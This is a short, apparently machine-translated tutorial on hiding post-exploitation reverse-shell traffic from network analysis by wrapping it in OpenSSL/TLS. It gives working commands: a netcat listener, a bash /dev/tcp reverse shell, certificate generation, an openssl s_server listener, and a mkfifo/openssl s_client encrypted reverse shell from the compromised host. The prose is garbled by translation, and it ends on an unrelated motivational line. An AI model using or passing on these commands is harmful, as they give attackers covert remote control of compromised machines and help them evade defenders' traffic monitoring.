Using OpenSSL encryption to rebound shell traffic

brief introduction

In the post penetration stage, it is often necessary to rebound for further horizontal operation shell, But rebound shell There is a drawback to both methods , Traffic is transmitted in clear text . Traffic analysis will soon be found , If you trace the attack traffic , Detect features with attacks , You can reproduce the attack process .

Experimental environment

kali：192.168.95.128

centos：192.168.95.147

Wireshark Grab the bag

stay kali Upper use nc Listening on a port

nc -lvvp 4444

take centos Of shell Bounce past

bash -i >& /dev/tcp/192.168.95.128/4444 0>&1

Use wireshark Grab traffic packets , Bounce back shell Then execute some commands

Right click to track tcp Stream query to see details

Use wireshark You can directly see the input command and return information by capturing packets

OpenSSL Rebound encryption shell

OpenSSL Is an open source software library package , Applications can use this package for secure communication , Avoid eavesdropping , At the same time, confirm the identity of the connector at the other end .

Use on the server openssl Command generates a self signed certificate

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

Certificate information can be entered or not

Use on the server openssl Command listens on a port

openssl s_server -quiet -key key.pem -cert cert.pem -port 4444

Use the command to execute the bounce on the client target host

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quite -connect 192.168.95.128:4444>/tmp/s;rm /tmp/s

Use wireshark Grab traffic packets , Received a rebound shell Then execute some commands

Check it again wireshark Captured traffic packets , It's encrypted

The server and client are using TLSv1.2 Protocol for encrypted communication .

Conclusion

I have eaten all the bitterness , If you haven't grown up , You'll lose .